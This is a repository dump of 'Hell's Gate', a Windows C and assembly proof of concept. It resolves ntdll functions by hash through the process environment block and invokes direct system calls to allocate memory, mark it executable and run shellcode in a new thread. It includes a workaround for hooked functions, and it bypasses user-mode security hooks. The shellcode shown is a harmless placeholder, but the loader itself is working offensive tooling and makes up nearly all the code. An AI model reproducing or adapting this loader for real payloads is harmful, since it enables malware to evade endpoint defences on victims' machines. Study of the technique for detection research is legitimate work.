├── .gitignore
├── HellsGate.sln
├── HellsGate
├── HellsGate.vcxproj
├── HellsGate.vcxproj.filters
├── hellsgate.asm
├── main.c
└── structs.h
├── README.md
└── hells-gate.pdf
/.gitignore:
--------------------------------------------------------------------------------
1 | ## Ignore Visual Studio temporary files, build results, and
2 | ## files generated by popular Visual Studio add-ons.
3 | ##
4 | ## Get latest from https://github.com/github/gitignore/blob/master/VisualStudio.gitignore
5 |
6 | # User-specific files
7 | *.rsuser
8 | *.suo
9 | *.user
10 | *.userosscache
11 | *.sln.docstates
12 |
13 | # User-specific files (MonoDevelop/Xamarin Studio)
14 | *.userprefs
15 |
16 | # Mono auto generated files
17 | mono_crash.*
18 |
19 | # Build results
20 | [Dd]ebug/
21 | [Dd]ebugPublic/
22 | [Rr]elease/
23 | [Rr]eleases/
24 | x64/
25 | x86/
26 | [Ww][Ii][Nn]32/
27 | [Aa][Rr][Mm]/
28 | [Aa][Rr][Mm]64/
29 | bld/
30 | [Bb]in/
31 | [Oo]bj/
32 | [Ll]og/
33 | [Ll]ogs/
34 |
35 | # Visual Studio 2015/2017 cache/options directory
36 | .vs/
37 | # Uncomment if you have tasks that create the project's static files in wwwroot
38 | #wwwroot/
39 |
40 | # Visual Studio 2017 auto generated files
41 | Generated\ Files/
42 |
43 | # MSTest test Results
44 | [Tt]est[Rr]esult*/
45 | [Bb]uild[Ll]og.*
46 |
47 | # NUnit
48 | *.VisualState.xml
49 | TestResult.xml
50 | nunit-*.xml
51 |
52 | # Build Results of an ATL Project
53 | [Dd]ebugPS/
54 | [Rr]eleasePS/
55 | dlldata.c
56 |
57 | # Benchmark Results
58 | BenchmarkDotNet.Artifacts/
59 |
60 | # .NET Core
61 | project.lock.json
62 | project.fragment.lock.json
63 | artifacts/
64 |
65 | # ASP.NET Scaffolding
66 | ScaffoldingReadMe.txt
67 |
68 | # StyleCop
69 | StyleCopReport.xml
70 |
71 | # Files built by Visual Studio
72 | *_i.c
73 | *_p.c
74 | *_h.h
75 | *.ilk
76 | *.meta
77 | *.obj
78 | *.iobj
79 | *.pch
80 | *.pdb
81 | *.ipdb
82 | *.pgc
83 | *.pgd
84 | *.rsp
85 | *.sbr
86 | *.tlb
87 | *.tli
88 | *.tlh
89 | *.tmp
90 | *.tmp_proj
91 | *_wpftmp.csproj
92 | *.log
93 | *.vspscc
94 | *.vssscc
95 | .builds
96 | *.pidb
97 | *.svclog
98 | *.scc
99 |
100 | # Chutzpah Test files
101 | _Chutzpah*
102 |
103 | # Visual C++ cache files
104 | ipch/
105 | *.aps
106 | *.ncb
107 | *.opendb
108 | *.opensdf
109 | *.sdf
110 | *.cachefile
111 | *.VC.db
112 | *.VC.VC.opendb
113 |
114 | # Visual Studio profiler
115 | *.psess
116 | *.vsp
117 | *.vspx
118 | *.sap
119 |
120 | # Visual Studio Trace Files
121 | *.e2e
122 |
123 | # TFS 2012 Local Workspace
124 | $tf/
125 |
126 | # Guidance Automation Toolkit
127 | *.gpState
128 |
129 | # ReSharper is a .NET coding add-in
130 | _ReSharper*/
131 | *.[Rr]e[Ss]harper
132 | *.DotSettings.user
133 |
134 | # TeamCity is a build add-in
135 | _TeamCity*
136 |
137 | # DotCover is a Code Coverage Tool
138 | *.dotCover
139 |
140 | # AxoCover is a Code Coverage Tool
141 | .axoCover/*
142 | !.axoCover/settings.json
143 |
144 | # Coverlet is a free, cross platform Code Coverage Tool
145 | coverage*[.json, .xml, .info]
146 |
147 | # Visual Studio code coverage results
148 | *.coverage
149 | *.coveragexml
150 |
151 | # NCrunch
152 | _NCrunch_*
153 | .*crunch*.local.xml
154 | nCrunchTemp_*
155 |
156 | # MightyMoose
157 | *.mm.*
158 | AutoTest.Net/
159 |
160 | # Web workbench (sass)
161 | .sass-cache/
162 |
163 | # Installshield output folder
164 | [Ee]xpress/
165 |
166 | # DocProject is a documentation generator add-in
167 | DocProject/buildhelp/
168 | DocProject/Help/*.HxT
169 | DocProject/Help/*.HxC
170 | DocProject/Help/*.hhc
171 | DocProject/Help/*.hhk
172 | DocProject/Help/*.hhp
173 | DocProject/Help/Html2
174 | DocProject/Help/html
175 |
176 | # Click-Once directory
177 | publish/
178 |
179 | # Publish Web Output
180 | *.[Pp]ublish.xml
181 | *.azurePubxml
182 | # Note: Comment the next line if you want to checkin your web deploy settings,
183 | # but database connection strings (with potential passwords) will be unencrypted
184 | *.pubxml
185 | *.publishproj
186 |
187 | # Microsoft Azure Web App publish settings. Comment the next line if you want to
188 | # checkin your Azure Web App publish settings, but sensitive information contained
189 | # in these scripts will be unencrypted
190 | PublishScripts/
191 |
192 | # NuGet Packages
193 | *.nupkg
194 | # NuGet Symbol Packages
195 | *.snupkg
196 | # The packages folder can be ignored because of Package Restore
197 | **/[Pp]ackages/*
198 | # except build/, which is used as an MSBuild target.
199 | !**/[Pp]ackages/build/
200 | # Uncomment if necessary however generally it will be regenerated when needed
201 | #!**/[Pp]ackages/repositories.config
202 | # NuGet v3's project.json files produces more ignorable files
203 | *.nuget.props
204 | *.nuget.targets
205 |
206 | # Microsoft Azure Build Output
207 | csx/
208 | *.build.csdef
209 |
210 | # Microsoft Azure Emulator
211 | ecf/
212 | rcf/
213 |
214 | # Windows Store app package directories and files
215 | AppPackages/
216 | BundleArtifacts/
217 | Package.StoreAssociation.xml
218 | _pkginfo.txt
219 | *.appx
220 | *.appxbundle
221 | *.appxupload
222 |
223 | # Visual Studio cache files
224 | # files ending in .cache can be ignored
225 | *.[Cc]ache
226 | # but keep track of directories ending in .cache
227 | !?*.[Cc]ache/
228 |
229 | # Others
230 | ClientBin/
231 | ~$*
232 | *~
233 | *.dbmdl
234 | *.dbproj.schemaview
235 | *.jfm
236 | *.pfx
237 | *.publishsettings
238 | orleans.codegen.cs
239 |
240 | # Including strong name files can present a security risk
241 | # (https://github.com/github/gitignore/pull/2483#issue-259490424)
242 | #*.snk
243 |
244 | # Since there are multiple workflows, uncomment next line to ignore bower_components
245 | # (https://github.com/github/gitignore/pull/1529#issuecomment-104372622)
246 | #bower_components/
247 |
248 | # RIA/Silverlight projects
249 | Generated_Code/
250 |
251 | # Backup & report files from converting an old project file
252 | # to a newer Visual Studio version. Backup files are not needed,
253 | # because we have git ;-)
254 | _UpgradeReport_Files/
255 | Backup*/
256 | UpgradeLog*.XML
257 | UpgradeLog*.htm
258 | ServiceFabricBackup/
259 | *.rptproj.bak
260 |
261 | # SQL Server files
262 | *.mdf
263 | *.ldf
264 | *.ndf
265 |
266 | # Business Intelligence projects
267 | *.rdl.data
268 | *.bim.layout
269 | *.bim_*.settings
270 | *.rptproj.rsuser
271 | *- [Bb]ackup.rdl
272 | *- [Bb]ackup ([0-9]).rdl
273 | *- [Bb]ackup ([0-9][0-9]).rdl
274 |
275 | # Microsoft Fakes
276 | FakesAssemblies/
277 |
278 | # GhostDoc plugin setting file
279 | *.GhostDoc.xml
280 |
281 | # Node.js Tools for Visual Studio
282 | .ntvs_analysis.dat
283 | node_modules/
284 |
285 | # Visual Studio 6 build log
286 | *.plg
287 |
288 | # Visual Studio 6 workspace options file
289 | *.opt
290 |
291 | # Visual Studio 6 auto-generated workspace file (contains which files were open etc.)
292 | *.vbw
293 |
294 | # Visual Studio LightSwitch build output
295 | **/*.HTMLClient/GeneratedArtifacts
296 | **/*.DesktopClient/GeneratedArtifacts
297 | **/*.DesktopClient/ModelManifest.xml
298 | **/*.Server/GeneratedArtifacts
299 | **/*.Server/ModelManifest.xml
300 | _Pvt_Extensions
301 |
302 | # Paket dependency manager
303 | .paket/paket.exe
304 | paket-files/
305 |
306 | # FAKE - F# Make
307 | .fake/
308 |
309 | # CodeRush personal settings
310 | .cr/personal
311 |
312 | # Python Tools for Visual Studio (PTVS)
313 | __pycache__/
314 | *.pyc
315 |
316 | # Cake - Uncomment if you are using it
317 | # tools/**
318 | # !tools/packages.config
319 |
320 | # Tabs Studio
321 | *.tss
322 |
323 | # Telerik's JustMock configuration file
324 | *.jmconfig
325 |
326 | # BizTalk build output
327 | *.btp.cs
328 | *.btm.cs
329 | *.odx.cs
330 | *.xsd.cs
331 |
332 | # OpenCover UI analysis results
333 | OpenCover/
334 |
335 | # Azure Stream Analytics local run output
336 | ASALocalRun/
337 |
338 | # MSBuild Binary and Structured Log
339 | *.binlog
340 |
341 | # NVidia Nsight GPU debugger configuration file
342 | *.nvuser
343 |
344 | # MFractors (Xamarin productivity tool) working folder
345 | .mfractor/
346 |
347 | # Local History for Visual Studio
348 | .localhistory/
349 |
350 | # BeatPulse healthcheck temp database
351 | healthchecksdb
352 |
353 | # Backup folder for Package Reference Convert tool in Visual Studio 2017
354 | MigrationBackup/
355 |
356 | # Ionide (cross platform F# VS Code tools) working folder
357 | .ionide/
358 |
359 | # Fody - auto-generated XML schema
360 | FodyWeavers.xsd
361 |
--------------------------------------------------------------------------------
/HellsGate.sln:
--------------------------------------------------------------------------------
1 |
2 | Microsoft Visual Studio Solution File, Format Version 12.00
3 | # Visual Studio Version 16
4 | VisualStudioVersion = 16.0.30114.105
5 | MinimumVisualStudioVersion = 10.0.40219.1
6 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "HellsGate", "HellsGate\HellsGate.vcxproj", "{DC6187CB-D5DF-4973-84A2-F92AAE90CDA9}"
7 | EndProject
8 | Global
9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution
10 | Debug|x64 = Debug|x64
11 | Debug|x86 = Debug|x86
12 | Release|x64 = Release|x64
13 | Release|x86 = Release|x86
14 | EndGlobalSection
15 | GlobalSection(ProjectConfigurationPlatforms) = postSolution
16 | {DC6187CB-D5DF-4973-84A2-F92AAE90CDA9}.Debug|x64.ActiveCfg = Debug|x64
17 | {DC6187CB-D5DF-4973-84A2-F92AAE90CDA9}.Debug|x64.Build.0 = Debug|x64
18 | {DC6187CB-D5DF-4973-84A2-F92AAE90CDA9}.Debug|x86.ActiveCfg = Debug|Win32
19 | {DC6187CB-D5DF-4973-84A2-F92AAE90CDA9}.Debug|x86.Build.0 = Debug|Win32
20 | {DC6187CB-D5DF-4973-84A2-F92AAE90CDA9}.Release|x64.ActiveCfg = Release|x64
21 | {DC6187CB-D5DF-4973-84A2-F92AAE90CDA9}.Release|x64.Build.0 = Release|x64
22 | {DC6187CB-D5DF-4973-84A2-F92AAE90CDA9}.Release|x86.ActiveCfg = Release|Win32
23 | {DC6187CB-D5DF-4973-84A2-F92AAE90CDA9}.Release|x86.Build.0 = Release|Win32
24 | EndGlobalSection
25 | GlobalSection(SolutionProperties) = preSolution
26 | HideSolutionNode = FALSE
27 | EndGlobalSection
28 | GlobalSection(ExtensibilityGlobals) = postSolution
29 | SolutionGuid = {AAAFFDAB-0074-4A3D-BA5B-63F51AA7F8EB}
30 | EndGlobalSection
31 | EndGlobal
32 |
--------------------------------------------------------------------------------
/HellsGate/HellsGate.vcxproj:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | Debug
6 | Win32
7 |
8 |
9 | Release
10 | Win32
11 |
12 |
13 | Debug
14 | x64
15 |
16 |
17 | Release
18 | x64
19 |
20 |
21 |
22 | 16.0
23 | Win32Proj
24 | {dc6187cb-d5df-4973-84a2-f92aae90cda9}
25 | HellsGate
26 | 10.0
27 |
28 |
29 |
30 | Application
31 | true
32 | v142
33 | Unicode
34 | false
35 |
36 |
37 | Application
38 | false
39 | v142
40 | true
41 | Unicode
42 | false
43 |
44 |
45 | Application
46 | true
47 | v142
48 | Unicode
49 | false
50 |
51 |
52 | Application
53 | false
54 | v142
55 | true
56 | Unicode
57 | false
58 |
59 |
60 |
61 |
62 |
63 |
64 |
65 |
66 |
67 |
68 |
69 |
70 |
71 |
72 |
73 |
74 |
75 |
76 |
77 |
78 |
79 | true
80 |
81 |
82 | false
83 |
84 |
85 | true
86 |
87 |
88 | false
89 |
90 |
91 |
92 | Level3
93 | true
94 | WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)
95 | true
96 |
97 |
98 | Console
99 | true
100 |
101 |
102 |
103 |
104 | Level3
105 | true
106 | true
107 | true
108 | WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)
109 | true
110 |
111 |
112 | Console
113 | true
114 | true
115 | true
116 |
117 |
118 |
119 |
120 | Level3
121 | true
122 | _DEBUG;_CONSOLE;%(PreprocessorDefinitions)
123 | true
124 |
125 |
126 | Console
127 | true
128 |
129 |
130 |
131 |
132 | Level3
133 | true
134 | true
135 | true
136 | NDEBUG;_CONSOLE;%(PreprocessorDefinitions)
137 | true
138 |
139 |
140 | Console
141 | true
142 | true
143 | true
144 |
145 |
146 |
147 |
148 |
149 |
150 |
151 |
152 |
153 |
154 | Document
155 |
156 |
157 |
158 |
159 |
160 |
161 |
--------------------------------------------------------------------------------
/HellsGate/HellsGate.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;c++;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 |
18 |
19 | Source Files
20 |
21 |
22 |
23 |
24 | Header Files
25 |
26 |
27 |
28 |
29 | Source Files
30 |
31 |
32 |
--------------------------------------------------------------------------------
/HellsGate/hellsgate.asm:
--------------------------------------------------------------------------------
1 | ; Hell's Gate
2 | ; Dynamic system call invocation
3 | ;
4 | ; by smelly__vx (@RtlMateusz) and am0nsec (@am0nsec)
5 |
6 | .data
7 | wSystemCall DWORD 000h
8 |
9 | .code
10 | HellsGate PROC
11 | mov wSystemCall, 000h
12 | mov wSystemCall, ecx
13 | ret
14 | HellsGate ENDP
15 |
16 | HellDescent PROC
17 | mov r10, rcx
18 | mov eax, wSystemCall
19 |
20 | syscall
21 | ret
22 | HellDescent ENDP
23 | end
24 |
--------------------------------------------------------------------------------
/HellsGate/main.c:
--------------------------------------------------------------------------------
1 | #pragma once
2 | #include
3 | #include "structs.h"
4 |
5 | /*--------------------------------------------------------------------
6 | VX Tables
7 | --------------------------------------------------------------------*/
8 | typedef struct _VX_TABLE_ENTRY {
9 | PVOID pAddress;
10 | DWORD64 dwHash;
11 | WORD wSystemCall;
12 | } VX_TABLE_ENTRY, * PVX_TABLE_ENTRY;
13 |
14 | typedef struct _VX_TABLE {
15 | VX_TABLE_ENTRY NtAllocateVirtualMemory;
16 | VX_TABLE_ENTRY NtProtectVirtualMemory;
17 | VX_TABLE_ENTRY NtCreateThreadEx;
18 | VX_TABLE_ENTRY NtWaitForSingleObject;
19 | } VX_TABLE, * PVX_TABLE;
20 |
21 | /*--------------------------------------------------------------------
22 | Function prototypes.
23 | --------------------------------------------------------------------*/
24 | PTEB RtlGetThreadEnvironmentBlock();
25 | BOOL GetImageExportDirectory(
26 | _In_ PVOID pModuleBase,
27 | _Out_ PIMAGE_EXPORT_DIRECTORY* ppImageExportDirectory
28 | );
29 | BOOL GetVxTableEntry(
30 | _In_ PVOID pModuleBase,
31 | _In_ PIMAGE_EXPORT_DIRECTORY pImageExportDirectory,
32 | _In_ PVX_TABLE_ENTRY pVxTableEntry
33 | );
34 | BOOL Payload(
35 | _In_ PVX_TABLE pVxTable
36 | );
37 | PVOID VxMoveMemory(
38 | _Inout_ PVOID dest,
39 | _In_ const PVOID src,
40 | _In_ SIZE_T len
41 | );
42 |
43 | /*--------------------------------------------------------------------
44 | External functions' prototype.
45 | --------------------------------------------------------------------*/
46 | extern VOID HellsGate(WORD wSystemCall);
47 | extern HellDescent();
48 |
49 | INT wmain() {
50 | PTEB pCurrentTeb = RtlGetThreadEnvironmentBlock();
51 | PPEB pCurrentPeb = pCurrentTeb->ProcessEnvironmentBlock;
52 | if (!pCurrentPeb || !pCurrentTeb || pCurrentPeb->OSMajorVersion != 0xA)
53 | return 0x1;
54 |
55 | // Get NTDLL module
56 | PLDR_DATA_TABLE_ENTRY pLdrDataEntry = (PLDR_DATA_TABLE_ENTRY)((PBYTE)pCurrentPeb->LoaderData->InMemoryOrderModuleList.Flink->Flink - 0x10);
57 |
58 | // Get the EAT of NTDLL
59 | PIMAGE_EXPORT_DIRECTORY pImageExportDirectory = NULL;
60 | if (!GetImageExportDirectory(pLdrDataEntry->DllBase, &pImageExportDirectory) || pImageExportDirectory == NULL)
61 | return 0x01;
62 |
63 | VX_TABLE Table = { 0 };
64 | Table.NtAllocateVirtualMemory.dwHash = 0xf5bd373480a6b89b;
65 | if (!GetVxTableEntry(pLdrDataEntry->DllBase, pImageExportDirectory, &Table.NtAllocateVirtualMemory))
66 | return 0x1;
67 |
68 | Table.NtCreateThreadEx.dwHash = 0x64dc7db288c5015f;
69 | if (!GetVxTableEntry(pLdrDataEntry->DllBase, pImageExportDirectory, &Table.NtCreateThreadEx))
70 | return 0x1;
71 |
72 | Table.NtProtectVirtualMemory.dwHash = 0x858bcb1046fb6a37;
73 | if (!GetVxTableEntry(pLdrDataEntry->DllBase, pImageExportDirectory, &Table.NtProtectVirtualMemory))
74 | return 0x1;
75 |
76 | Table.NtWaitForSingleObject.dwHash = 0xc6a2fa174e551bcb;
77 | if (!GetVxTableEntry(pLdrDataEntry->DllBase, pImageExportDirectory, &Table.NtWaitForSingleObject))
78 | return 0x1;
79 |
80 | Payload(&Table);
81 | return 0x00;
82 | }
83 |
84 | PTEB RtlGetThreadEnvironmentBlock() {
85 | #if _WIN64
86 | return (PTEB)__readgsqword(0x30);
87 | #else
88 | return (PTEB)__readfsdword(0x16);
89 | #endif
90 | }
91 |
92 | DWORD64 djb2(PBYTE str) {
93 | DWORD64 dwHash = 0x7734773477347734;
94 | INT c;
95 |
96 | while (c = *str++)
97 | dwHash = ((dwHash << 0x5) + dwHash) + c;
98 |
99 | return dwHash;
100 | }
101 |
102 | BOOL GetImageExportDirectory(PVOID pModuleBase, PIMAGE_EXPORT_DIRECTORY* ppImageExportDirectory) {
103 | // Get DOS header
104 | PIMAGE_DOS_HEADER pImageDosHeader = (PIMAGE_DOS_HEADER)pModuleBase;
105 | if (pImageDosHeader->e_magic != IMAGE_DOS_SIGNATURE) {
106 | return FALSE;
107 | }
108 |
109 | // Get NT headers
110 | PIMAGE_NT_HEADERS pImageNtHeaders = (PIMAGE_NT_HEADERS)((PBYTE)pModuleBase + pImageDosHeader->e_lfanew);
111 | if (pImageNtHeaders->Signature != IMAGE_NT_SIGNATURE) {
112 | return FALSE;
113 | }
114 |
115 | // Get the EAT
116 | *ppImageExportDirectory = (PIMAGE_EXPORT_DIRECTORY)((PBYTE)pModuleBase + pImageNtHeaders->OptionalHeader.DataDirectory[0].VirtualAddress);
117 | return TRUE;
118 | }
119 |
120 | BOOL GetVxTableEntry(PVOID pModuleBase, PIMAGE_EXPORT_DIRECTORY pImageExportDirectory, PVX_TABLE_ENTRY pVxTableEntry) {
121 | PDWORD pdwAddressOfFunctions = (PDWORD)((PBYTE)pModuleBase + pImageExportDirectory->AddressOfFunctions);
122 | PDWORD pdwAddressOfNames = (PDWORD)((PBYTE)pModuleBase + pImageExportDirectory->AddressOfNames);
123 | PWORD pwAddressOfNameOrdinales = (PWORD)((PBYTE)pModuleBase + pImageExportDirectory->AddressOfNameOrdinals);
124 |
125 | for (WORD cx = 0; cx < pImageExportDirectory->NumberOfNames; cx++) {
126 | PCHAR pczFunctionName = (PCHAR)((PBYTE)pModuleBase + pdwAddressOfNames[cx]);
127 | PVOID pFunctionAddress = (PBYTE)pModuleBase + pdwAddressOfFunctions[pwAddressOfNameOrdinales[cx]];
128 |
129 | if (djb2(pczFunctionName) == pVxTableEntry->dwHash) {
130 | pVxTableEntry->pAddress = pFunctionAddress;
131 |
132 | // Quick and dirty fix in case the function has been hooked
133 | WORD cw = 0;
134 | while (TRUE) {
135 | // check if syscall, in this case we are too far
136 | if (*((PBYTE)pFunctionAddress + cw) == 0x0f && *((PBYTE)pFunctionAddress + cw + 1) == 0x05)
137 | return FALSE;
138 |
139 | // check if ret, in this case we are also probaly too far
140 | if (*((PBYTE)pFunctionAddress + cw) == 0xc3)
141 | return FALSE;
142 |
143 | // First opcodes should be :
144 | // MOV R10, RCX
145 | // MOV RCX,
146 | if (*((PBYTE)pFunctionAddress + cw) == 0x4c
147 | && *((PBYTE)pFunctionAddress + 1 + cw) == 0x8b
148 | && *((PBYTE)pFunctionAddress + 2 + cw) == 0xd1
149 | && *((PBYTE)pFunctionAddress + 3 + cw) == 0xb8
150 | && *((PBYTE)pFunctionAddress + 6 + cw) == 0x00
151 | && *((PBYTE)pFunctionAddress + 7 + cw) == 0x00) {
152 | BYTE high = *((PBYTE)pFunctionAddress + 5 + cw);
153 | BYTE low = *((PBYTE)pFunctionAddress + 4 + cw);
154 | pVxTableEntry->wSystemCall = (high << 8) | low;
155 | break;
156 | }
157 |
158 | cw++;
159 | };
160 | }
161 | }
162 |
163 | return TRUE;
164 | }
165 |
166 | BOOL Payload(PVX_TABLE pVxTable) {
167 | NTSTATUS status = 0x00000000;
168 | char shellcode[] = "\x90\x90\x90\x90\xcc\xcc\xcc\xcc\xc3";
169 |
170 | // Allocate memory for the shellcode
171 | PVOID lpAddress = NULL;
172 | SIZE_T sDataSize = sizeof(shellcode);
173 | HellsGate(pVxTable->NtAllocateVirtualMemory.wSystemCall);
174 | status = HellDescent((HANDLE)-1, &lpAddress, 0, &sDataSize, MEM_COMMIT, PAGE_READWRITE);
175 |
176 | // Write Memory
177 | VxMoveMemory(lpAddress, shellcode, sizeof(shellcode));
178 |
179 | // Change page permissions
180 | ULONG ulOldProtect = 0;
181 | HellsGate(pVxTable->NtProtectVirtualMemory.wSystemCall);
182 | status = HellDescent((HANDLE)-1, &lpAddress, &sDataSize, PAGE_EXECUTE_READ, &ulOldProtect);
183 |
184 | // Create thread
185 | HANDLE hHostThread = INVALID_HANDLE_VALUE;
186 | HellsGate(pVxTable->NtCreateThreadEx.wSystemCall);
187 | status = HellDescent(&hHostThread, 0x1FFFFF, NULL, (HANDLE)-1, (LPTHREAD_START_ROUTINE)lpAddress, NULL, FALSE, NULL, NULL, NULL, NULL);
188 |
189 | // Wait for 1 seconds
190 | LARGE_INTEGER Timeout;
191 | Timeout.QuadPart = -10000000;
192 | HellsGate(pVxTable->NtWaitForSingleObject.wSystemCall);
193 | status = HellDescent(hHostThread, FALSE, &Timeout);
194 |
195 | return TRUE;
196 | }
197 |
198 | PVOID VxMoveMemory(PVOID dest, const PVOID src, SIZE_T len) {
199 | char* d = dest;
200 | const char* s = src;
201 | if (d < s)
202 | while (len--)
203 | *d++ = *s++;
204 | else {
205 | char* lasts = s + (len - 1);
206 | char* lastd = d + (len - 1);
207 | while (len--)
208 | *lastd-- = *lasts--;
209 | }
210 | return dest;
211 | }
--------------------------------------------------------------------------------
/HellsGate/structs.h:
--------------------------------------------------------------------------------
1 | #pragma once
2 | #include
3 |
4 | /*--------------------------------------------------------------------
5 | STRUCTURES
6 | --------------------------------------------------------------------*/
7 | typedef struct _LSA_UNICODE_STRING {
8 | USHORT Length;
9 | USHORT MaximumLength;
10 | PWSTR Buffer;
11 | } LSA_UNICODE_STRING, * PLSA_UNICODE_STRING, UNICODE_STRING, * PUNICODE_STRING, * PUNICODE_STR;
12 |
13 | typedef struct _LDR_MODULE {
14 | LIST_ENTRY InLoadOrderModuleList;
15 | LIST_ENTRY InMemoryOrderModuleList;
16 | LIST_ENTRY InInitializationOrderModuleList;
17 | PVOID BaseAddress;
18 | PVOID EntryPoint;
19 | ULONG SizeOfImage;
20 | UNICODE_STRING FullDllName;
21 | UNICODE_STRING BaseDllName;
22 | ULONG Flags;
23 | SHORT LoadCount;
24 | SHORT TlsIndex;
25 | LIST_ENTRY HashTableEntry;
26 | ULONG TimeDateStamp;
27 | } LDR_MODULE, * PLDR_MODULE;
28 |
29 | typedef struct _PEB_LDR_DATA {
30 | ULONG Length;
31 | ULONG Initialized;
32 | PVOID SsHandle;
33 | LIST_ENTRY InLoadOrderModuleList;
34 | LIST_ENTRY InMemoryOrderModuleList;
35 | LIST_ENTRY InInitializationOrderModuleList;
36 | } PEB_LDR_DATA, * PPEB_LDR_DATA;
37 |
38 | typedef struct _PEB {
39 | BOOLEAN InheritedAddressSpace;
40 | BOOLEAN ReadImageFileExecOptions;
41 | BOOLEAN BeingDebugged;
42 | BOOLEAN Spare;
43 | HANDLE Mutant;
44 | PVOID ImageBase;
45 | PPEB_LDR_DATA LoaderData;
46 | PVOID ProcessParameters;
47 | PVOID SubSystemData;
48 | PVOID ProcessHeap;
49 | PVOID FastPebLock;
50 | PVOID FastPebLockRoutine;
51 | PVOID FastPebUnlockRoutine;
52 | ULONG EnvironmentUpdateCount;
53 | PVOID* KernelCallbackTable;
54 | PVOID EventLogSection;
55 | PVOID EventLog;
56 | PVOID FreeList;
57 | ULONG TlsExpansionCounter;
58 | PVOID TlsBitmap;
59 | ULONG TlsBitmapBits[0x2];
60 | PVOID ReadOnlySharedMemoryBase;
61 | PVOID ReadOnlySharedMemoryHeap;
62 | PVOID* ReadOnlyStaticServerData;
63 | PVOID AnsiCodePageData;
64 | PVOID OemCodePageData;
65 | PVOID UnicodeCaseTableData;
66 | ULONG NumberOfProcessors;
67 | ULONG NtGlobalFlag;
68 | BYTE Spare2[0x4];
69 | LARGE_INTEGER CriticalSectionTimeout;
70 | ULONG HeapSegmentReserve;
71 | ULONG HeapSegmentCommit;
72 | ULONG HeapDeCommitTotalFreeThreshold;
73 | ULONG HeapDeCommitFreeBlockThreshold;
74 | ULONG NumberOfHeaps;
75 | ULONG MaximumNumberOfHeaps;
76 | PVOID** ProcessHeaps;
77 | PVOID GdiSharedHandleTable;
78 | PVOID ProcessStarterHelper;
79 | PVOID GdiDCAttributeList;
80 | PVOID LoaderLock;
81 | ULONG OSMajorVersion;
82 | ULONG OSMinorVersion;
83 | ULONG OSBuildNumber;
84 | ULONG OSPlatformId;
85 | ULONG ImageSubSystem;
86 | ULONG ImageSubSystemMajorVersion;
87 | ULONG ImageSubSystemMinorVersion;
88 | ULONG GdiHandleBuffer[0x22];
89 | ULONG PostProcessInitRoutine;
90 | ULONG TlsExpansionBitmap;
91 | BYTE TlsExpansionBitmapBits[0x80];
92 | ULONG SessionId;
93 | } PEB, * PPEB;
94 |
95 | typedef struct __CLIENT_ID {
96 | HANDLE UniqueProcess;
97 | HANDLE UniqueThread;
98 | } CLIENT_ID, * PCLIENT_ID;
99 |
100 | typedef struct _TEB_ACTIVE_FRAME_CONTEXT {
101 | ULONG Flags;
102 | PCHAR FrameName;
103 | } TEB_ACTIVE_FRAME_CONTEXT, * PTEB_ACTIVE_FRAME_CONTEXT;
104 |
105 | typedef struct _TEB_ACTIVE_FRAME {
106 | ULONG Flags;
107 | struct _TEB_ACTIVE_FRAME* Previous;
108 | PTEB_ACTIVE_FRAME_CONTEXT Context;
109 | } TEB_ACTIVE_FRAME, * PTEB_ACTIVE_FRAME;
110 |
111 | typedef struct _GDI_TEB_BATCH {
112 | ULONG Offset;
113 | ULONG HDC;
114 | ULONG Buffer[310];
115 | } GDI_TEB_BATCH, * PGDI_TEB_BATCH;
116 |
117 | typedef PVOID PACTIVATION_CONTEXT;
118 |
119 | typedef struct _RTL_ACTIVATION_CONTEXT_STACK_FRAME {
120 | struct __RTL_ACTIVATION_CONTEXT_STACK_FRAME* Previous;
121 | PACTIVATION_CONTEXT ActivationContext;
122 | ULONG Flags;
123 | } RTL_ACTIVATION_CONTEXT_STACK_FRAME, * PRTL_ACTIVATION_CONTEXT_STACK_FRAME;
124 |
125 | typedef struct _ACTIVATION_CONTEXT_STACK {
126 | PRTL_ACTIVATION_CONTEXT_STACK_FRAME ActiveFrame;
127 | LIST_ENTRY FrameListCache;
128 | ULONG Flags;
129 | ULONG NextCookieSequenceNumber;
130 | ULONG StackId;
131 | } ACTIVATION_CONTEXT_STACK, * PACTIVATION_CONTEXT_STACK;
132 |
133 | typedef struct _TEB {
134 | NT_TIB NtTib;
135 | PVOID EnvironmentPointer;
136 | CLIENT_ID ClientId;
137 | PVOID ActiveRpcHandle;
138 | PVOID ThreadLocalStoragePointer;
139 | PPEB ProcessEnvironmentBlock;
140 | ULONG LastErrorValue;
141 | ULONG CountOfOwnedCriticalSections;
142 | PVOID CsrClientThread;
143 | PVOID Win32ThreadInfo;
144 | ULONG User32Reserved[26];
145 | ULONG UserReserved[5];
146 | PVOID WOW32Reserved;
147 | LCID CurrentLocale;
148 | ULONG FpSoftwareStatusRegister;
149 | PVOID SystemReserved1[54];
150 | LONG ExceptionCode;
151 | #if (NTDDI_VERSION >= NTDDI_LONGHORN)
152 | PACTIVATION_CONTEXT_STACK* ActivationContextStackPointer;
153 | UCHAR SpareBytes1[0x30 - 3 * sizeof(PVOID)];
154 | ULONG TxFsContext;
155 | #elif (NTDDI_VERSION >= NTDDI_WS03)
156 | PACTIVATION_CONTEXT_STACK ActivationContextStackPointer;
157 | UCHAR SpareBytes1[0x34 - 3 * sizeof(PVOID)];
158 | #else
159 | ACTIVATION_CONTEXT_STACK ActivationContextStack;
160 | UCHAR SpareBytes1[24];
161 | #endif
162 | GDI_TEB_BATCH GdiTebBatch;
163 | CLIENT_ID RealClientId;
164 | PVOID GdiCachedProcessHandle;
165 | ULONG GdiClientPID;
166 | ULONG GdiClientTID;
167 | PVOID GdiThreadLocalInfo;
168 | PSIZE_T Win32ClientInfo[62];
169 | PVOID glDispatchTable[233];
170 | PSIZE_T glReserved1[29];
171 | PVOID glReserved2;
